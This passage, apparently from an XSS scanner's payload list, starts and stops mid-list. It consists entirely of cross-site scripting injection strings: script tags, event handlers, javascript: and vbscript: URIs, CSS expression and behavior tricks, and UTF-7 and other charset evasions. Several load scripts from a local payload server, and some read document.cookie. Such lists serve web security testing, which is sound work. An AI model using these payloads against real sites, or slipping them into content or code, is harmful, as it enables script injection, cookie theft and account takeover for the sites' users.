Function,[{}][0].constructor._(\'javascript:alert(1)\')()</script>', "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", '<meta 
charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '\'><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '\'><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '<meta charset="mac-farsi">?script?javascript:alert(1)?/script?', '"><meta charset="mac-farsi">?script?javascript:alert(1)?/script?', '\'><meta charset="mac-farsi">?script?javascript:alert(1)?/script?', 'X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >', '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>', '<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>', '"><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>', "'><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>", '1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>', '<a 
style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '"><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '\'><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '<x style="behavior:url(%(sct)s)">', '"><x style="behavior:url(%(sct)s)">', '\'><x style="behavior:url(%(sct)s)">', '<xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '"><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '\'><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '<event-source src="%(event)s" onload="javascript:alert(1)">', '"><event-source src="%(event)s" onload="javascript:alert(1)">', '\'><event-source src="%(event)s" onload="javascript:alert(1)">', '<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '"><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '\'><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">', '"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">', '\'><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">', '<script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', 
'"><script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', "'><script>%(payload)s</script>", '</ScrIpt><script>%(payload)s</script>', '<script src=%(jscript)s></script>', '"><script src=%(jscript)s></script>', "'><script src=%(jscript)s></script>", "<script language='javascript' src='%(jscript)s'></script>", '"><script language=\'javascript\' src=\'%(jscript)s\'></script>', "'><script language='javascript' src='%(jscript)s'></script>", '<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>', '<IMG SRC="javascript:javascript:alert(1);">', '"><IMG SRC="javascript:javascript:alert(1);">', '\'><IMG SRC="javascript:javascript:alert(1);">', '<IMG SRC=javascript:javascript:alert(1)>', '"><IMG SRC=javascript:javascript:alert(1)>', "'><IMG SRC=javascript:javascript:alert(1)>", '<IMG SRC=`javascript:javascript:alert(1)`>', '"><IMG SRC=`javascript:javascript:alert(1)`>', "'><IMG SRC=`javascript:javascript:alert(1)`>", '<SCRIPT SRC=%(jscript)s?<B>', '"><SCRIPT SRC=%(jscript)s?<B>', "'><SCRIPT SRC=%(jscript)s?<B>", '<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '<BODY ONLOAD=javascript:alert(1)>', '"><BODY ONLOAD=javascript:alert(1)>', "'><BODY ONLOAD=javascript:alert(1)>", '<BODY ONLOAD=javascript:javascript:alert(1)>', '"><BODY ONLOAD=javascript:javascript:alert(1)>', "'><BODY ONLOAD=javascript:javascript:alert(1)>", '<IMG SRC="jav\tascript:javascript:alert(1);">', '"><IMG SRC="jav\tascript:javascript:alert(1);">', '\'><IMG SRC="jav\tascript:javascript:alert(1);">', '<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>', '"><BODY 
onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>', "'><BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>", '<SCRIPT/SRC="%(jscript)s"></SCRIPT>', '"><SCRIPT/SRC="%(jscript)s"></SCRIPT>', '\'><SCRIPT/SRC="%(jscript)s"></SCRIPT>', '<<SCRIPT>%(payload)s//<</SCRIPT>', '"><<SCRIPT>%(payload)s//<</SCRIPT>', "'><<SCRIPT>%(payload)s//<</SCRIPT>", '<IMG SRC="javascript:javascript:alert(1)"', '"><IMG SRC="javascript:javascript:alert(1)"', '\'><IMG SRC="javascript:javascript:alert(1)"', '<iframe src=%(scriptlet)s <', '"><iframe src=%(scriptlet)s <', "'><iframe src=%(scriptlet)s <", '<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '"><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '\'><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '<IMG DYNSRC="javascript:javascript:alert(1)">', '"><IMG DYNSRC="javascript:javascript:alert(1)">', '\'><IMG DYNSRC="javascript:javascript:alert(1)">', '<IMG LOWSRC="javascript:javascript:alert(1)">', '"><IMG LOWSRC="javascript:javascript:alert(1)">', '\'><IMG LOWSRC="javascript:javascript:alert(1)">', '<BGSOUND SRC="javascript:javascript:alert(1);">', '"><BGSOUND SRC="javascript:javascript:alert(1);">', '\'><BGSOUND SRC="javascript:javascript:alert(1);">', '<BR SIZE="&{javascript:alert(1)}">', '"><BR SIZE="&{javascript:alert(1)}">', '\'><BR SIZE="&{javascript:alert(1)}">', '<LAYER SRC="%(scriptlet)s"></LAYER>', '"><LAYER SRC="%(scriptlet)s"></LAYER>', '\'><LAYER SRC="%(scriptlet)s"></LAYER>', '<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', '"><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', '\'><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', "<STYLE>@import'%(css)s';</STYLE>", '"><STYLE>@import\'%(css)s\';</STYLE>', "'><STYLE>@import'%(css)s';</STYLE>", '<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">', '"><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">', '\'><META HTTP-EQUIV="Link" Content="<%(css)s>; 
REL=stylesheet">', '<X STYLE="behavior: url(%(htc)s);">', '"><X STYLE="behavior: url(%(htc)s);">', '\'><X STYLE="behavior: url(%(htc)s);">', '<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '"><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '\'><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '"><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '\'><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '<TABLE BACKGROUND="javascript:javascript:alert(1)">', '"><TABLE BACKGROUND="javascript:javascript:alert(1)">', '\'><TABLE BACKGROUND="javascript:javascript:alert(1)">', '<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '"><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '\'><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '<DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '"><DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '\'><DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '<DIV STYLE="width:expression(javascript:alert(1));">', '"><DIV STYLE="width:expression(javascript:alert(1));">', '\'><DIV STYLE="width:expression(javascript:alert(1));">', '<IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">', '"><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">', '\'><IMG 
STYLE="X:expr/*X*/ession(javascript:alert(1))">', '<X STYLE="X:expression(javascript:alert(1))">', '"><X STYLE="X:expression(javascript:alert(1))">', '\'><X STYLE="X:expression(javascript:alert(1))">', '<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '"><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '\'><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '<STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->', '"><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->', "'><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->", '<BASE HREF="javascript:javascript:alert(1);//">', '"><BASE HREF="javascript:javascript:alert(1);//">', '\'><BASE HREF="javascript:javascript:alert(1);//">', '<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '"><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '\'><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>', '"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>', "'><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>", '<HTML xmlns:X><?import namespace="X" 
implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '"><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '\'><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>', '<SCRIPT SRC="%(jpg)s"></SCRIPT>', '"><SCRIPT SRC="%(jpg)s"></SCRIPT>', '\'><SCRIPT SRC="%(jpg)s"></SCRIPT>', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '"><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '\'><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '<body 
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', '"><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', "'><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", '<P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', '"><P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', '\'><P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>", '"><STYLE>a{background:url(\'s1\' \'s2)}@import javascript:javascript:alert(1);\');}</STYLE>', "'><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>", '<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '"><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '\'><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>', '"><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>', "'><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>", '<style onreadystatechange=javascript:javascript:alert(1);></style>', '"><style onreadystatechange=javascript:javascript:alert(1);></style>', "'><style onreadystatechange=javascript:javascript:alert(1);></style>", '<?xml version="1.0"?><html:html 
xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '"><?xml version="1.0"?><html:html xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '\'><?xml version="1.0"?><html:html xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '<embed code=%(scriptlet)s></embed>', '"><embed code=%(scriptlet)s></embed>', "'><embed code=%(scriptlet)s></embed>", '<embed code=javascript:javascript:alert(1);></embed>', '"><embed code=javascript:javascript:alert(1);></embed>', "'><embed code=javascript:javascript:alert(1);></embed>", '<embed src=%(jscript)s></embed>', '"><embed src=%(jscript)s></embed>', "'><embed src=%(jscript)s></embed>", '<frameset onload=javascript:javascript:alert(1)></frameset>', '"><frameset onload=javascript:javascript:alert(1)></frameset>', "'><frameset onload=javascript:javascript:alert(1)></frameset>", '<object onerror=javascript:javascript:alert(1)>', '"><object onerror=javascript:javascript:alert(1)>', "'><object onerror=javascript:javascript:alert(1)>", '<embed type="image" src=%(scriptlet)s></embed>', '"><embed type="image" src=%(scriptlet)s></embed>', '\'><embed type="image" src=%(scriptlet)s></embed>', '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '"><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '\'><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '<IMG SRC=&{javascript:alert(1);};>', '"><IMG SRC=&{javascript:alert(1);};>', "'><IMG SRC=&{javascript:alert(1);};>", '<a href="javAascript:javascript:alert(1)">test1</a>', '"><a href="javAascript:javascript:alert(1)">test1</a>', '\'><a href="javAascript:javascript:alert(1)">test1</a>', '<a href="javaascript:javascript:alert(1)">test1</a>', '"><a href="javaascript:javascript:alert(1)">test1</a>', '\'><a 
href="javaascript:javascript:alert(1)">test1</a>', '<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', '"><script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', "'><script>%(payload)s</script>", '</ScrIpt><script>%(payload)s</script>"></embed>', '<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">', '"><iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">', '\'><iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">', 'alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--', '></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>', '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>", '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>", '<IMG SRC="javascript:alert(\'X\');">', '"><IMG SRC="javascript:alert(\'X\');">', '\'><IMG SRC="javascript:alert(\'X\');">', "<IMG SRC=javascript:alert('X')>", '"><IMG SRC=javascript:alert(\'X\')>', "'><IMG SRC=javascript:alert('X')>", "<IMG SRC=JaVaScRiPt:alert('X')>", '"><IMG SRC=JaVaScRiPt:alert(\'X\')>', "'><IMG SRC=JaVaScRiPt:alert('X')>", '<IMG SRC=javascript:alert("X")>', '"><IMG SRC=javascript:alert("X")>', '\'><IMG SRC=javascript:alert("X")>', '<IMG SRC=`javascript:alert("X says, \'X\'")`>', '"><IMG SRC=`javascript:alert("X says, \'X\'")`>', '\'><IMG SRC=`javascript:alert("X says, \'X\'")`>', '<a onmouseover="alert(document.cookie)">X link</a>', '"><a onmouseover="alert(document.cookie)">X link</a>', '\'><a onmouseover="alert(document.cookie)">X link</a>', '<a 
onmouseover=alert(document.cookie)>X link</a>', '"><a onmouseover=alert(document.cookie)>X link</a>', "'><a onmouseover=alert(document.cookie)>X link</a>", '<IMG """><SCRIPT>alert("X")</SCRIPT>">', '"><IMG """><SCRIPT>alert("X")</SCRIPT>">', '\'><IMG """><SCRIPT>alert("X")</SCRIPT>">', '<IMG SRC= onmouseover="alert(\'X\')">', '"><IMG SRC= onmouseover="alert(\'X\')">', '\'><IMG SRC= onmouseover="alert(\'X\')">', '<IMG onmouseover="alert(\'X\')">', '"><IMG onmouseover="alert(\'X\')">', '\'><IMG onmouseover="alert(\'X\')">', '<IMG SRC="jav	ascript:alert(\'X\');">', '"><IMG SRC="jav	ascript:alert(\'X\');">', '\'><IMG SRC="jav	ascript:alert(\'X\');">', '<IMG SRC="jav
ascript:alert(\'X\');">', '"><IMG SRC="jav
ascript:alert(\'X\');">', '\'><IMG SRC="jav
ascript:alert(\'X\');">', 'perl -e \'print "<IMG SRC=java\\0script:alert(\\"X\\")>";\' > out', '<IMG SRC="  javascript:alert(\'X\');">', '"><IMG SRC="  javascript:alert(\'X\');">', '\'><IMG SRC="  javascript:alert(\'X\');">', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<<SCRIPT>alert("X");//<</SCRIPT>', '"><<SCRIPT>alert("X");//<</SCRIPT>', '\'><<SCRIPT>alert("X");//<</SCRIPT>', '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >", '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >", '<SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>', '"><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>', "'><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>", '<IMG SRC="javascript:alert(\'X\')"', '"><IMG SRC="javascript:alert(\'X\')"', '\'><IMG SRC="javascript:alert(\'X\')"', 
'</TITLE><SCRIPT>alert("X");</SCRIPT>', '"></TITLE><SCRIPT>alert("X");</SCRIPT>', '\'></TITLE><SCRIPT>alert("X");</SCRIPT>', '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '"><INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '\'><INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '<BODY BACKGROUND="javascript:alert(\'X\')">', '"><BODY BACKGROUND="javascript:alert(\'X\')">', '\'><BODY BACKGROUND="javascript:alert(\'X\')">', '<IMG DYNSRC="javascript:alert(\'X\')">', '"><IMG DYNSRC="javascript:alert(\'X\')">', '\'><IMG DYNSRC="javascript:alert(\'X\')">', '<IMG LOWSRC="javascript:alert(\'X\')">', '"><IMG LOWSRC="javascript:alert(\'X\')">', '\'><IMG LOWSRC="javascript:alert(\'X\')">', '<STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '"><STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '\'><STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '<IMG SRC=\'vbscript:msgbox("X")\'>', '"><IMG SRC=\'vbscript:msgbox("X")\'>', '\'><IMG SRC=\'vbscript:msgbox("X")\'>', '<IMG SRC="livescript:[code]">', '"><IMG SRC="livescript:[code]">', '\'><IMG SRC="livescript:[code]">', "<BODY ONLOAD=alert('X')>", '"><BODY ONLOAD=alert(\'X\')>', "'><BODY ONLOAD=alert('X')>", '<BGSOUND SRC="javascript:alert(\'X\');">', '"><BGSOUND SRC="javascript:alert(\'X\');">', '\'><BGSOUND SRC="javascript:alert(\'X\');">', '<BR SIZE="&{alert(\'X\')}">', '"><BR SIZE="&{alert(\'X\')}">', '\'><BR SIZE="&{alert(\'X\')}">', '<LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '"><LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '\'><LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '<STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', '"><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', '\'><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', 
'<STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '"><STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '\'><STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '<IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '"><IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '\'><IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '<STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '"><STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '\'><STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '<STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '<X STYLE="X:expression(alert(\'X\'))">', '"><X STYLE="X:expression(alert(\'X\'))">', '\'><X STYLE="X:expression(alert(\'X\'))">', '<X STYLE="behavior: url(X.htc);">', '"><X STYLE="behavior: url(X.htc);">', '\'><X STYLE="behavior: url(X.htc);">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" 